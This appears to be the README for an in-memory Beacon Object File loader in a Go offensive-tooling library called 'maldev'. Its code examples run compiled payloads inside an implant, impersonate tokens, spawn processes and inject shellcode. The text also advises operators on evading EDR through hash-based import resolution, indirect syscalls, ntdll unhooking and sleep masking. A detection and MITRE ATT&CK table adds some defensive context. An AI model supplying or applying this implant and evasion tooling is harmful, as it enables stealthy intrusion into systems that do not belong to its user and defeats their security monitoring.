BOF (Beacon Object File) loader


TL;DR

You have a .o file (compiled C object) — typically a public BOF from TrustedSec / Outflank / FortyNorth (whoami, situational awareness, file ops). You want to run it inside your implant without spawning a child process. This package loads + executes the COFF in memory.

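| You want to… | Use | Notes |
|---|---|---|
| Run a BOF from disk | RunFromFile (or Load + Execute) | Loads the .o, parses the COFF, resolves the Beacon API, executes |
| Run a BOF from memory | RunFromBytes | When the BOF was decrypted in-process and never landed on disk |
| Pass arguments to the BOF (parsed via BeaconData*) | NewArgs / ArgsFromStrings, passed as the Execute args or Spec.Args | Packed into one buffer that the BOF's BeaconDataInt / BeaconDataExtract etc. consume |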

What this DOES achieve:

  • Public BOFs (TrustedSec/CS-Situational-Awareness-BOF, TrustedSec/CS-Remote-OPs-BOF, Outflank/C2-Tool-Collection) run unmodified.
  • Beacon API stubs implemented in Go — no Cobalt Strike needed on the operator side.
  • Dynamic imports (KERNEL32, ADVAPI32, …) resolve through a PEB walk + ROR13 export-hash match, so no GetProcAddress / LoadLibrary call shows up in the API trail.

What this DOES NOT achieve (out of the box):

  • No ARM64. x86 and x64 are both supported (x86 via the cross-process loader under -tags=bof_x86_loader, see below).
  • In-process by default: a crash in the BOF kills the implant. The default Execute path runs the BOF on the calling goroutine's OS thread with no isolation. Opt in via SetSacrificialThread to run the BOF on a dedicated thread, where a VEH turns faults inside the BOF mapping into a recoverable Go error.
  • AMSI / ETW telemetry from the BOF still fires — pair with evasion/preset.Stealth before Run.

Primer

A BOF is a relocatable COFF object (.o) compiled by MSVC / MinGW. It plays the same role as an unlinked ELF .o on Linux, but uses the Windows COFF layout and PE-style (IMAGE_REL_AMD64_*) relocations. BOFs were popularised by Cobalt Strike's inline-execute command, a tactical execution primitive that runs a small piece of native code inside the implant's process without spawning a fresh process or writing a PE to disk.

Use cases:

  • Run small Windows-API-heavy snippets (token enum, share enum, share scan) that don't need a full PE infrastructure.
  • Distribute compiled techniques as a .o artefact rather than a full implant.
  • Compose with the implant's runtime — the BOF runs in the caller's address space, so it can interact with implant state directly.

How It Works

flowchart LR
    INPUT[BOF .o bytes] --> PARSE[parse COFF<br>header + sections]
    PARSE --> ALLOC[VirtualAlloc RW<br>copy every section w/ raw data]
    ALLOC --> RELOC[apply relocations<br>ADDR64 / ADDR32NB / REL32]
    RELOC --> IMP[resolve __imp_*<br>PEB walk + ROR13]
    IMP --> FLIP[VirtualProtect<br>exec sections → RX]
    FLIP --> SEH[RtlAddFunctionTable<br>register .pdata]
    SEH --> SYM[resolve entry symbol<br>from COFF symtab]
    SYM --> EXEC[call entry<br>inline OR sacrificial thread]
    EXEC --> OUT[capture output<br>BeaconPrintf / BeaconOutput]

API → godoc

pkg.go.dev/github.com/oioio-space/maldev/runtime/bof is the authoritative reference for every exported symbol. This page teaches the concepts; the godoc is the specification.

Examples

Simple — load + execute

import (
    "fmt"
    "log"
    "os"

    "github.com/oioio-space/maldev/runtime/bof"
)

data, err := os.ReadFile("whoami.o")
if err != nil {
    log.Fatal(err)
}
b, err := bof.Load(data)
if err != nil {
    log.Fatal(err)
}
defer b.Close()
output, err := b.Execute(nil)
if err != nil {
    log.Fatal(err)
}
fmt.Println(string(output))

Shorter — one-shot helpers (v0.156.0+)

The same three-step pattern (Load → Execute → Close), wrapped in a single call. Four helpers cover the common cases:

// 1. One-shot from bytes (embedded via go:embed, decrypted in
//    memory, ...). Load + Execute + Close in one call.
out, err := bof.RunFromBytes(coffBytes, nil)

// 2. One-shot from disk. The stealthopen.Opener parameter is
//    optional; nil falls back to os.Open. Pass a *Stealth /
//    *MultiStealth to read the file via NTFS Object-ID and
//    bypass path-based EDR file hooks.
out, err = bof.RunFromFile(nil, "whoami.o", nil)

// 3. Pack a list of strings without the NewArgs boilerplate.
args := bof.ArgsFromStrings("target.exe", "C:\\Windows\\System32")
out, err = bof.RunFromBytes(coffBytes, args)

// 4. Crash-isolated one-shot. Identical to RunFromBytes but
//    spawns the entry on a sacrificial OS thread with VEH-
//    mediated fault catching. Required: a non-zero timeout.
out, err = bof.RunSafe(coffBytes, args, 5*time.Second)

Prefer the long form (Load + many Execute + Close) when the same *BOF runs many times — the prepare pass amortises across calls. Use the helpers for genuinely one-shot workloads.

Composed — chain multiple BOFs

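for _, path := range []string{"whoami.o", "netstat.o", "tasklist.o"} {
    data, err := os.ReadFile(path)
    if err != nil {
        continue
    }
    b, err := bof.Load(data)
    if err != nil {
        continue
    }
    out, err := b.Execute(nil)
    b.Close() // free this BOF's RX mapping before loading the next one
    if err != nil {
        continue
    }
    fmt.Printf("=== %s ===\n%s\n", path, out)
}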

Advanced — pack arguments via Args

data, _ := os.ReadFile("parse_args.o")
b, err := bof.Load(data)
if err != nil {
    log.Fatal(err)
}
defer b.Close()

a := bof.NewArgs()
a.AddInt(42)
a.AddString("hello-args")

out, _ := b.Execute(a.Pack())
fmt.Println(string(out))

The wire format is little-endian to match the Cobalt Strike convention: TrustedSec COFFLoader, Outflank et al. read length prefixes via memcpy into a native int, which on x64 is a little-endian load. Use AddInt / AddShort for fixed-width ints (BeaconDataInt reads 4 bytes, BeaconDataShort 2), AddString for length-prefixed NUL-terminated strings, and AddBytes for raw blobs.

Spec.Sacrificial + Spec.Timeout — crash isolation via Run (v0.156.0+)

The Run(ctx, Spec) façade now honours the same sacrificial-thread contract as (*BOF).SetSacrificialThread:

res, err := bof.Run(ctx, bof.Spec{
    Bytes:       coffBytes,
    Args:        args,
    Sacrificial: true,
    Timeout:     30 * time.Second, // mandatory when Sacrificial is set
})

Sacrificial=true without a Timeout returns ErrSacrificialNoTimeout: the package refuses to launch a thread with no wall-clock cap, since an unbounded wait (INFINITE passed to WaitForSingleObject) is almost never what an implant wants.

Architecture routing — x64 in-process, x86 cross-process (v0.155.0+)

bof.Run sniffs the COFF Machine field and dispatches: x64 runs in-process, x86 runs in a spawned SysWOW64\rundll32.exe via the cross-process loader DLL embedded under the bof_x86_loader build tag. Without the tag, x86 input returns the sentinel bof.ErrCrossArchX86Unsupported so callers can branch on architecture without parsing the file themselves.

import (
    "context"
    "errors"
    "fmt"
    "log"
    "os"

    "github.com/oioio-space/maldev/runtime/bof"
)

data, err := os.ReadFile(bofPath)
if err != nil {
    log.Fatal(err)
}
res, err := bof.Run(context.Background(), bof.Spec{Bytes: data})
switch {
case err == nil:
    // Auto-routed: x64 ran in-process, x86 ran in a WoW64 helper
    // if the implant was built with `-tags=bof_x86_loader`.
    fmt.Println(string(res.Output))
case errors.Is(err, bof.ErrCrossArchX86Unsupported):
    // 32-bit .o detected and this implant was NOT compiled with
    // `bof_x86_loader`. The build-tag gate keeps the implant
    // small for missions that don't need x86 — rebuild with the
    // tag (or fall back to a separate 32-bit implant) when an
    // x86 BOF actually shows up in the corpus.
    log.Printf("skip %s: rebuild with -tags=bof_x86_loader", bofPath)
default:
    log.Printf("bof.Run failed: %v", err)
}

bof.DetectKind(data) is also exported if a caller wants to classify the bytes without running them — handy for triage tools that enumerate a public corpus before execution. See runtime/bof/internal/x86loader/README.md for the x86 loader architecture (Beacon API symbol surface, parent ↔ helper IPC, threat model).

Token impersonation + spawn-and-inject

The slice-1 surface lets a CS BOF impersonate, spawn a sacrificial target, and inject without any extra glue:

b, _ := bof.Load(coffBytes)
b.SetSpawnTo(`C:\Windows\System32\notepad.exe`)
b.SetUserData(payloadShellcode) // optional, surfaced via BeaconGetCustomUserData

out, _ := b.Execute(nil)
// The BOF internally calls:
//   BeaconUseToken(handle)             → ImpersonateLoggedOnUser
//   BeaconSpawnTemporaryProcess(...)   → CreateProcess suspended
//   BeaconInjectTemporaryProcess(...)  → write + CreateRemoteThread + Resume
//   BeaconRevertToken()                → RevertToSelf
fmt.Println(string(out))

Execute pins the goroutine to its OS thread for the entire call, so the impersonation in step 1 is honoured by the syscalls the BOF issues in later steps.

Reuse — prepare once, run many (v0.153.0+)

A single *BOF can be Execute'd any number of times. The expensive load work runs lazily on the first call and is cached on the BOF; subsequent calls skip straight to the entry point.

Cost breakdown per call:

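| Phase | First Execute | Subsequent Execute |
|---|---|---|
| Parse sections | ✓ | - |
| VirtualAlloc + section copy | ✓ | - |
| Resolve imports (PEB walk × N) | ✓ | - |
| Apply relocations | ✓ | - |
| VirtualProtect RW→RX | ✓ | - |
| Reset writable sections (if not persistent) | - | ✓ (cheap) |
| Call entry | ✓ | ✓ |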

import (
    "fmt"
    "os"

    "github.com/oioio-space/maldev/runtime/bof"
)

data, _ := os.ReadFile("whoami.o")
b, _ := bof.Load(data)
defer b.Close() // releases the cached RX mapping + .pdata unwind table

// First call: full parse + alloc + reloc + execute.
out1, _ := b.Execute(nil)
fmt.Println(string(out1))

// Second call: reuses the mapping, just re-runs the entry.
out2, _ := b.Execute(nil)
fmt.Println(string(out2))

Close() — release the cached mapping

b, _ := bof.Load(data)
out, _ := b.Execute(nil)
fmt.Println(string(out))
if err := b.Close(); err != nil {
    log.Printf("Close: %v", err)
}

// After Close, Execute returns an error rather than crashing.
if _, err := b.Execute(nil); err != nil {
    // "runtime/bof: Execute on closed BOF"
    log.Printf("expected: %v", err)
}

Close is idempotent — multiple calls are safe. It does two things in order: RtlDeleteFunctionTable (unregister the .pdata unwind entries from Bundle E) then VirtualFree (drop the RX mapping). A runtime.SetFinalizer in Load is a safety net for callers who forget Close, but Go finalizer timing isn't guaranteed: long-lived implants should Close explicitly to free the mapping in a timely fashion.

SetPersistent — stateful vs stateless BOFs (v0.153.0+)

SetPersistent arbitrates whether writable sections (.data, .bss, .rdata-with-writes) are restored between Execute calls.

| Mode | Behaviour | Suits |
|---|---|---|
| false (default) | Each Execute restores writable sections to their initial bytes | Stateless BOFs: hello_beacon, parse_args, realworld_calls, most of the CS-SA-BOF corpus |
| true | Writable sections retain whatever the BOF wrote on the previous Execute | Stateful BOFs that intentionally cache cross-call state in .data, e.g. Fortra No-Consolation's LIBS_LOADED cache + handle-info struct |

Must be called before the first Execute — see ErrAlreadyPrepared.

Stateless (default) — every call sees fresh memory

b, _ := bof.Load(parseArgsBytes)
defer b.Close()

// Writable sections (.data, .bss) are restored to their initial
// bytes before each Execute. The BOF observes the same initial
// state on every call regardless of what previous calls wrote.
for _, arg := range []string{"alice", "bob", "carol"} {
    a := bof.NewArgs()
    a.AddString(arg)
    out, _ := b.Execute(a.Pack())
    fmt.Printf("%s → %s\n", arg, out)
}

Persistent — share state across Execute calls

b, _ := bof.Load(noConsolationBytes)
defer b.Close()

if err := b.SetPersistent(true); err != nil {
    // SetPersistent before Execute always succeeds — error
    // means the caller flipped it AFTER the first Execute,
    // which is a contract violation (ErrAlreadyPrepared).
    log.Fatal(err)
}

// Iteration 1: No-Consolation cold-loads all DLL dependencies,
// stores their handles in LIBS_LOADED (a .data global) via
// BeaconAddValue.
b.Execute(packArgs(pe1))

// Iteration 2: LIBS_LOADED is still warm — the BOF skips the
// LoadLibrary chain entirely.
b.Execute(packArgs(pe2))

SetPersistent after Execute → ErrAlreadyPrepared

b, _ := bof.Load(bytes)
defer b.Close()
b.Execute(nil) // runs prepare() — locks the persistence mode

if err := b.SetPersistent(true); errors.Is(err, bof.ErrAlreadyPrepared) {
    // Expected: flipping the mode after prepare would leave
    // the writable-section snapshots inconsistent. Decide at
    // Load time which mode you want.
}

SetSacrificialThread — crash isolation (v0.154.0+)

By default a BOF runs on the same OS thread as the implant. A wild pointer dereference, stack overflow, or busted relocation inside the BOF triggers a Windows SEH exception that propagates through Go's runtime handler and ends in TerminateProcess: the implant dies with the BOF.

SetSacrificialThread(timeout) enables crash isolation: the BOF runs on a dedicated thread, a process-wide Vectored Exception Handler intercepts faults whose address lies inside the BOF mapping, redirects the faulting thread to an ExitThread(1) stub, and the host Execute call returns a clean Go error. The implant keeps running.

| Mode | When the BOF AVs | Host process |
|---|---|---|
| Inline (default) | SEH → Go runtime → TerminateProcess | dies with the BOF |
| Sacrificial (SetSacrificialThread > 0) | VEH catches the in-mapping fault → ExitThread → host gets an error | survives |

Honest limitations

  1. Token impersonation does not cross threads by default — use SetExecuteAsToken to pin one. BeaconUseToken inside the BOF impersonates on the BOF's sacrificial thread; the host goroutine keeps its original token. To start the sacrificial thread under a specific identity, call (*BOF).SetExecuteAsToken(token) before Execute — the loader applies it via SetThreadToken between CreateThread(SUSPENDED) and ResumeThread. BOFs that rely on chained token state across calls still need to manage the chain themselves.
  2. Only faults inside the BOF mapping are caught. A BOF that passes a NULL pointer to kernel32!HeapAlloc takes the fault inside kernel32 — outside the BOF range — and still terminates the implant. The VEH range check is on ExceptionAddress, not on the calling BOF.
  3. TerminateThread (used on timeout) leaks the thread's stack + any kernel objects it held. Windows-design limitation. Set timeouts generously; this is a last-resort kill, not a routine cancellation primitive.
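
Limitation 2 follows directly from how the handler decides. Below is a pure-Go model of that decision with hypothetical names. The real handler is registered with AddVectoredExceptionHandler, reads EXCEPTION_RECORD.ExceptionAddress, and on a hit also rewrites the thread CONTEXT to land on the ExitThread(1) stub; this sketch leaves the CONTEXT rewrite out.

```go
package main

import "fmt"

// Return values a vectored exception handler can give Windows.
const (
	exceptionContinueSearch    int32 = 0  // EXCEPTION_CONTINUE_SEARCH
	exceptionContinueExecution int32 = -1 // EXCEPTION_CONTINUE_EXECUTION
)

// inMapping reports whether addr lies in [base, base+size). Comparing
// addr-base against size avoids overflow in base+size.
func inMapping(addr, base, size uintptr) bool {
	return addr >= base && addr-base < size
}

// vehDecision: faults inside the BOF mapping are claimed (the real handler
// would redirect the thread first); everything else is passed on, which is
// why a fault inside kernel32 still reaches the default handling.
func vehDecision(exceptionAddress, base, size uintptr) int32 {
	if inMapping(exceptionAddress, base, size) {
		return exceptionContinueExecution
	}
	return exceptionContinueSearch
}

func main() {
	const base, size = uintptr(0x20000000), uintptr(0x3000)
	fmt.Println(vehDecision(base+0x10, base, size)) // inside the BOF mapping
	fmt.Println(vehDecision(base+size, base, size)) // one byte past the end
	fmt.Println(vehDecision(0x30001000, base, size)) // e.g. inside a system DLL
}
```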

Inline (default) — same thread, fastest

b, _ := bof.Load(coffBytes)
defer b.Close()

// SetSacrificialThread NOT called → inline path.
// If this BOF AVs, the implant dies.
out, _ := b.Execute(args)

Sacrificial — implant survives BOF crashes

b, _ := bof.Load(coffBytes)
defer b.Close()

// 5-second wall-clock cap. Zero would disable.
if err := b.SetSacrificialThread(5 * time.Second); err != nil {
    log.Fatal(err) // ErrAlreadyPrepared if called after Execute
}

out, err := b.Execute(args)
switch {
case err == nil:
    // Happy path — BOF returned normally.
    fmt.Println(string(out))
case strings.Contains(err.Error(), "BOF crashed with exception"):
    // BOF AVed / stack-overflowed / executed an illegal
    // instruction inside its own mapping. Implant is still
    // alive; err carries the exception code + faulting PC.
    log.Printf("BOF crash isolated: %v", err)
case strings.Contains(err.Error(), "BOF timeout"):
    // BOF ran longer than the timeout; the sacrificial
    // thread was terminated. Output captured up to the
    // timeout is in `out`.
    log.Printf("BOF timeout, partial output: %s", out)
default:
    // Other Execute error — usually a Load/prepare problem
    // surfaced lazily on the first call.
    log.Fatal(err)
}

Mixing knobs

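Each knob below is set independently, so pick what fits your threat model and combine freely. The one coupling: SetExecuteAsToken only takes effect on the sacrificial path, so pair it with SetSacrificialThread.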

b, _ := bof.Load(realworldCallsBytes)
defer b.Close()

b.SetSpawnTo(`C:\Windows\System32\notepad.exe`)
b.SetUserData(payload)                   // surfaced via BeaconGetCustomUserData
b.SetPersistent(false)                   // default — fresh .data per call
b.SetSacrificialThread(30 * time.Second) // implant survives BOF crashes
b.SetCaller(myIndirectCaller)            // route BeaconInjectProcess via Nt*
b.SetExecuteAsToken(impersonationToken)  // run the sacrificial thread under that token

for _, target := range targets {
    out, err := b.Execute(packArgs(target))
    if err != nil {
        // Whatever the BOF does inside, this `err` is
        // recoverable: bad BOF code, bad target, timeout.
        // The implant doesn't die.
        log.Printf("%s: %v", target, err)
        continue
    }
    process(out)
}

SetCaller — route cross-process Beacon API via *wsyscall.Caller (v0.156.0+)

BeaconInjectProcess (and the spawn/inject combos that build on it) drives three cross-process kernel32 calls: VirtualAllocEx, WriteProcessMemory, CreateRemoteThread. By default these go through the kernel32 wrappers; under userland-hooking EDR they appear in the API trail. SetCaller redirects all three through a *wsyscall.Caller so they route via NtAllocateVirtualMemory / NtWriteVirtualMemory / NtCreateThreadEx — direct, indirect, hells-gate, or any combination the operator builds.

import (
    "github.com/oioio-space/maldev/runtime/bof"
    wsyscall "github.com/oioio-space/maldev/win/syscall"
)

// Indirect syscalls with a hells-gate-style SSN resolver.
caller := wsyscall.New(wsyscall.MethodIndirect, wsyscall.NewHellsGate())
defer caller.Close()

b, _ := bof.Load(coffBytes)
defer b.Close()
b.SetCaller(caller)
_, _ = b.Execute(args)

nil — the default — keeps the kernel32 path. The Caller's lifetime is operator-owned: BOF.Close does NOT call caller.Close, so the same Caller can be shared across many BOFs and inject sites. Matches the convention used across inject.

Scope: only the BeaconInjectProcess primitives route through the Caller. Dynamic imports the BOF itself resolves — __imp_KERNEL32$VirtualAlloc, __imp_ADVAPI32$OpenProcessToken, __imp_NTDLL$Nt*, etc. — are patched into the BOF's import table at prepare time as direct function addresses (PEB walk + ROR13 export match). When the BOF later issues mov reg, [rip+slot]; call reg, it jumps straight to the resolved function and bypasses the operator's Caller entirely.

For full coverage of the BOF's own Win32 calls, clean ntdll instead. The public-corpus audit (CS-SA, 37 BOFs, 652 imports) shows 55% are kernel32/advapi32/etc. wrappers and only 0.4% are direct Nt* calls, so a per-import shim would intercept only that 0.4%. The pragmatic answer is evasion/unhook: once ntdll's Nt* thunks are restored to their on-disk bytes, the kernel32!VirtualAlloc → ntdll!NtAllocateVirtualMemory path goes through a clean syscall stub and no hook fires. Pair SetCaller with evasion/unhook for end-to-end bypass.

See .dev/refactor-2026/bundle-i-import-routing.md for the closed design discussion + corpus data.

SetExecuteAsToken — pin a token on the sacrificial thread (v0.156.0+)

Closes the historical limitation where BeaconUseToken inside the BOF impersonated only on the sacrificial thread but Execute started that thread under the host's primary token. With SetExecuteAsToken, the loader applies SetThreadToken between CreateThread(SUSPENDED) and ResumeThread — the BOF entry runs under the supplied identity from instruction zero.

Requires SeImpersonatePrivilege (admin / service contexts by default) or a token the caller is permitted to assign.

import (
    "log"
    "time"

    "github.com/oioio-space/maldev/runtime/bof"
    "golang.org/x/sys/windows"
)

// Duplicate the current process's primary token to an
// impersonation-grade copy with TOKEN_IMPERSONATE rights.
var primary windows.Token
if err := windows.OpenProcessToken(windows.CurrentProcess(),
    windows.TOKEN_DUPLICATE|windows.TOKEN_QUERY, &primary); err != nil {
    log.Fatal(err)
}
defer primary.Close()

var dup windows.Token
if err := windows.DuplicateTokenEx(primary,
    windows.TOKEN_IMPERSONATE|windows.TOKEN_QUERY,
    nil,
    windows.SecurityImpersonation, windows.TokenImpersonation,
    &dup); err != nil {
    log.Fatal(err)
}
defer dup.Close()

b, err := bof.Load(coffBytes)
if err != nil {
    log.Fatal(err)
}
defer b.Close()
b.SetSacrificialThread(5 * time.Second) // required: the token only applies on the sacrificial path
b.SetExecuteAsToken(dup)
_, _ = b.Execute(args)

Zero — the default — keeps the host's primary token. Has no effect on inline Execute (the host's own token always applies on that path).

OPSEC & Detection

| Artefact | Where defenders look |
|---|---|
| VirtualAlloc(RW) → VirtualProtect(RX) cycle on a single mapping (the loader pattern) | Behavioural EDR: a generic reflective-loader signal even though no RWX page is ever exposed. The two-call cadence is itself a tell |
| MEM_TOP_DOWN allocation with IMAGE_SCN_MEM_EXECUTE content not backed by a loaded module | ETW Microsoft-Windows-Threat-Intelligence (TI events) |
| BOF entry-point execution from non-image memory | Defender for Endpoint MsSense |
| RtlAddFunctionTable for a non-image RUNTIME_FUNCTION array (Bundle E) | Niche; few products inspect, but kernel ETW captures the kernel-side registration |
| syscall.NewCallback trampolines for the Beacon API (~28 callbacks) | Calls from the BOF into Go land in the runtime's precompiled callbackasm table inside the binary's .text, not in fresh allocations; the same pattern any Go program with native callbacks emits |

D3FEND counters:

  • D3-PA — execute-from-allocation telemetry (RX-after-flip still trips the more thorough EDRs).
  • D3-FCA — YARA on the loaded bytes.

Hardening already in the loader by default:

  • RW → RX flip via VirtualProtect after relocations land (loader behaviour since v0.151; no RWX is ever exposed).
  • MEM_TOP_DOWN placement (high-address bias reduces collision with the host's heap + the most naive low-RVA scanner rules).

Operator-side hardening (opt-in):

  • Encrypt the BOF at rest via crypto; decrypt + load + immediately re-encrypt the source buffer.
  • Pair with evasion/sleepmask for cleartext-at-rest mitigation.
  • Bypass kernel32 userland hooks on the cross-process Beacon API via (*BOF).SetCaller.

MITRE ATT&CK

| T-ID | Name | Sub-coverage | D3FEND counter |
|---|---|---|---|
| T1059 | Command and Scripting Interpreter | partial: in-memory native code execution | D3-PA |
| T1620 | Reflective Code Loading | full: COFF reflective load | D3-FCA, D3-PA |

Limitations

  • Execute is amortised, not free (v0.153+). The first call on a *BOF runs the full loader pass (parse + VirtualAlloc + relocations + RW→RX flip + .pdata registration). Subsequent calls reuse the mapping — ideal for callers like runtime/pe that load one .o and run it many times. Caller responsibility: call Close() explicitly when done. The runtime.SetFinalizer safety net in Load will eventually RtlDeleteFunctionTable + VirtualFree, but Go finalizer timing isn't guaranteed; long-lived implants leaking RX mappings is a real liability.

  • Default Execute is stateless. Writable sections (.data, .bss, .rdata-with-writes) are restored to their initial bytes between Execute calls. BOFs that intentionally cache state in their .data (No-Consolation's LIBS_LOADED cache) need SetPersistent(true) before the first Execute.

  • Beacon-API surface — full 28-symbol set (slice 1, v0.151+). All beacon.h groups are wired:

    • Data parsing: BeaconDataParse / DataInt / DataShort / DataLength / DataExtract.
    • Output / format: BeaconPrintf + BeaconFormatPrintf (format string forwarded verbatim — varargs caveat below), BeaconOutput, BeaconFormatAlloc / Reset / Free / Append / Int / ToString, BeaconErrorD / ErrorDD / ErrorNA.
    • Tokens: BeaconUseToken (ImpersonateLoggedOnUser) / BeaconRevertToken (RevertToSelf). Execute pins the goroutine to its OS thread for the BOF call so the impersonation is honoured by subsequent Win32 calls; we RevertToSelf on Execute exit as a safety net.
    • Injection: BeaconInjectProcess (VirtualAllocEx + WriteProcessMemory + CreateRemoteThread on a host handle), BeaconSpawnTemporaryProcess (CreateProcess suspended on the configured SpawnTo — rundll32.exe by default), BeaconInjectTemporaryProcess (spawn + inject + resume, teardown on failure), BeaconCleanupProcess (terminate + close).
    • Helpers: BeaconIsAdmin, BeaconGetCustomUserData (blob configured via (*BOF).SetUserData), toWideChar (UTF-8 → UTF-16LE, NUL-terminated).
    • Key-value store: BeaconAddValue / BeaconGetValue / BeaconRemoveValue. Scope is the single Execute call — cross-Run state must go through the implant. Any unknown __imp_Beacon* import still fails at relocation time with unresolved external symbol __imp_BeaconXxx — loud and traceable rather than silent NULL-patching.
  • BeaconFormatAlloc buffers live one Execute call. Slices produced by BeaconFormatAlloc are held on the *BOF (per-instance map, not a process-global). BeaconFormatFree drops the entry; whatever the BOF forgets to free is reclaimed automatically when the next Execute starts and on Close(). A BOF that crashes mid-call no longer leaks its format buffer for the process lifetime.

  • SEH unwind via RtlAddFunctionTable. Every COFF with a non-empty .pdata section gets its RUNTIME_FUNCTION entries registered with the OS unwinder during prepare, so frames inside the BOF mapping can be resolved. Without this, a BOF that raises a structured exception (C++ throw, compiler-emitted bounds check, RaiseException) would abort during the unwind walk, because the unwinder could not find a function entry for the BOF's PC. Registration is silent on failure (malformed .pdata → the BOF still runs, just without SEH support). Close calls RtlDeleteFunctionTable before VirtualFree to avoid leaving dangling unwind context.

  • Cross-process Beacon API routes via optional *wsyscall.Caller. BeaconInjectProcess and the spawn/inject combos use VirtualAllocEx + WriteProcessMemory + CreateRemoteThread by default. Operators that need to bypass userland hooks on these kernel32 surfaces call (*BOF).SetCaller with any *wsyscall.Caller (direct / indirect / indirect-asm / hells-gate). The helpers (beaconRemoteAlloc, beaconRemoteWrite, beaconRemoteCreateThread) then route through NtAllocateVirtualMemory / NtWriteVirtualMemory / NtCreateThreadEx. nil Caller keeps the kernel32 path — matches the convention used across inject.

  • Pointer-safety probes on %s / Beacon string reads. BeaconPrintf("%s", p) (and any callback that dereferences a BOF-supplied char* / wchar_t*) routes through win/api.CStringFromPtr and win/api.WStringFromPtr. Both call VirtualQuery once to clamp the walk to the committed region containing the pointer, so a malformed, freed, or guard-page-crossing pointer returns "" instead of faulting the host. The wide-string heuristic in expandCFormat shares the same probe via SafeRegionBytes.

  • BeaconPrintf / BeaconFormatPrintf varargs are not expanded. syscall.NewCallback binds a fixed-arity Go function as a stdcall callback; Go cannot introspect cdecl varargs from inside the callback. We chose option (a) in the design discussion: forward the format string verbatim. BOFs that pass a literal format with no % directives behave correctly; BOFs relying on printf-style expansion see the format string raw.

    Two alternatives were considered and rejected for the default build:

    • (b) Leave __imp_BeaconPrintf / BeaconFormatPrintf unresolved so BOFs that depend on varargs fail at load time with a loud error. Honest but breaks compatibility with the large TrustedSec / Outflank corpus where BeaconPrintf(CALLBACK_OUTPUT, "...") is used as a no-args writer in 80% of cases.

    • (c) Implement varargs via cgo. A C wrapper around vsnprintf would expand the format and call back into Go with the rendered string. Requires:

      1. A C cross-compile toolchain in the build environment (mingw-w64 on Linux dev hosts, MSVC on Windows CI).
      2. CGO_ENABLED=1 — flips the entire library out of pure-Go mode, which the README sells as a hard guarantee.
      3. A different binary surface in runtime/bof for cgo vs. pure-Go builds, plus a build-tag matrix.

      The cost is steep relative to the gain (a minority of BOFs). Operators who need full vararg expansion can fork the package, drop a bof_cgo_windows.go file behind //go:build windows && cgo && bof_cgo, and supply a C-side vsnprintf wrapper they register via a hook hung off resolveBeaconImport. That extension point is intentionally left open; the default build prioritises pure-Go and accepts the verbatim-format trade-off.

  • External Win32 imports: two forms supported. The CS-canonical dollar form (__imp_KERNEL32$LoadLibraryA) resolves via parseDollarImport → api.ResolveByHash (PEB walk + ROR13 module/function hash, so no GetProcAddress / LoadLibrary call appears in the API trail). The mingw-w64 bare form (__imp_LoadLibraryA, with no DLL prefix) resolves by walking a curated module list (kernel32, advapi32, user32, ws2_32, ole32, shell32); the first hit wins. Symbols not in the curated set still fail loudly. Add a module to bareImportSearchOrder in beacon_api_windows.go if a particular BOF needs more coverage.

  • Concurrency: BOF execution is serialised package-wide. The Beacon API stubs read a single currentBOF pointer guarded by bofMu. Concurrent Execute calls — including across different *BOF instances — block on each other. This matches the CS-compatible loader convention (BOF execution is fundamentally single-threaded) and keeps the Beacon callback state coherent without per-call dispatch. Implications:

    • Setters (SetUserData, SetSpawnTo, SetSpawnToX86, SetCaller, SetExecuteAsToken, SetPersistent, SetSacrificialThread) are NOT lock-protected. They are safe to call before the first Execute or between Execute calls; calling them from a host goroutine while a sacrificial-thread Execute is in flight is a race the package does not currently guard against. Until a per-BOF mutex lands, callers that need to mutate state mid-flight should drive each BOF from a single goroutine.
    • Errors() after Close() returns the FINAL Execute's buffer, not nil. The byte buffer is not zeroed at teardown — post-mortem inspection works.
    • syscall.NewCallback cost at first Load. Resolving the Beacon import map registers one Go callback per Beacon symbol (~28 on the default build). Go does not allocate fresh pages for these: NewCallback hands out entries from the runtime's precompiled callbackasm trampoline table in the binary's .text. The registrations are permanent for the process lifetime and count toward the Go runtime's fixed per-process callback limit (2000). Identical to every Go program that uses syscall.NewCallback.
  • x86 BOFs supported via cross-process reflective load (-tags=bof_x86_loader, v0.155.0+). An x86 .o (Machine == 0x014c) is detected as KindCOFFx86 by DetectKind and routed through the coffX86Loader. With the bof_x86_loader build tag active, the orchestrator manually reflective-loads a small i386 DLL (runtime/bof/internal/x86loader/bof_x86_loader.x86.dll, ~11 KB) into a freshly spawned SysWOW64\rundll32.exe via VirtualAllocEx + WriteProcessMemory + .reloc application + CreateRemoteThread. The loader DLL parses the BOF .o inside the WoW64 helper, implements 25 Beacon API symbols (full beacon.h Groups 1–6 + BeaconGetOutputData + the four Inject/Spawn process-control entries), and writes captured output into a parent-allocated RW region, which the parent reads back with ReadProcessMemory. Zero disk artefacts, and the loader DLL is never passed to LoadLibrary. Default builds (no tag) surface bof.ErrCrossArchX86Unsupported, which operators check with errors.Is. See runtime/bof/internal/x86loader/README.md for the architecture diagram, ABI, and threat-model notes.

  • Relocation coverage. IMAGE_REL_AMD64_ABSOLUTE (no-op), _ADDR64, _ADDR32 (errors out cleanly when target exceeds 32-bit range), _ADDR32NB, _REL32, and the _REL32_1 through _REL32_5 bias variants. Exotic relocations (TLS, GOT, _SECTION, _SECREL) are not supported — the loader fails with unsupported relocation type: 0xNN so the failure mode is obvious instead of a silent corruption.

  • No RWX is exposed. The loader allocates PAGE_READWRITE, then flips exec sections to PAGE_EXECUTE_READ after relocations land. Hardened EDRs still flag the VirtualAlloc → VirtualProtect(EXECUTE) cadence on a fresh mapping; pair with evasion/sleepmask to hide the mapping at rest.
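
The pointer-safety probe from the list above can be modelled in a few lines. In the sketch, a byte slice and its base address stand in for the committed region VirtualQuery would report; cStringInRegion is a hypothetical name, and returning "" for an unterminated string (rather than a truncated one) is an assumption based on the description of CStringFromPtr, not its confirmed behaviour.

```go
package main

import (
	"bytes"
	"fmt"
)

// cStringInRegion reads a NUL-terminated string that starts at ptr without
// reading past the end of region, which stands in for the committed range
// VirtualQuery reports (BaseAddress .. BaseAddress+RegionSize).
func cStringInRegion(region []byte, regionBase, ptr uintptr) string {
	if ptr < regionBase || ptr-regionBase >= uintptr(len(region)) {
		return "" // pointer is not inside the committed region at all
	}
	tail := region[ptr-regionBase:]
	if i := bytes.IndexByte(tail, 0); i >= 0 {
		return string(tail[:i])
	}
	return "" // no NUL before the region ends: treat as malformed
}

func main() {
	region := []byte("hello\x00world")
	const base = uintptr(0x1000)
	fmt.Printf("%q\n", cStringInRegion(region, base, base))   // terminated string
	fmt.Printf("%q\n", cStringInRegion(region, base, base+6)) // runs off the region end
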